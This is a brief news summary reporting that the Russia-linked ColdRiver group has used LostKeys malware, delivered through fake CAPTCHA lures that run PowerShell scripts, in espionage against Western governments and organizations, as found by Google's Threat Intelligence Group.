<ul><li>Russia-linked ColdRiver, also known as APT COLDRIVER, has been using LostKeys malware in recent espionage attacks on Western governments and organizations since early 2025.</li><li>The ColdRiver APT group primarily targets NATO countries, along with the Baltics, Nordics, and Eastern Europe, including Ukraine, focusing on government officials, military personnel, journalists, and think tanks.</li><li>LostKeys malware is deployed through a multi-step chain, starting with a fake CAPTCHA to trick users into running PowerShell scripts. It is capable of stealing files, sending system information to the attacker, and running processes.</li><li>Google’s Threat Intelligence Group discovered LostKeys malware in selective ClickFix attacks, with victims being tricked into running malicious PowerShell scripts that led to data theft via VBS payloads. Two additional samples were found dating back to December 2023, leading to uncertainty about their relation to COLDRIVER.</li></ul>

Russia-linked ColdRiver used LostKeys malware in recent attacks

Discover more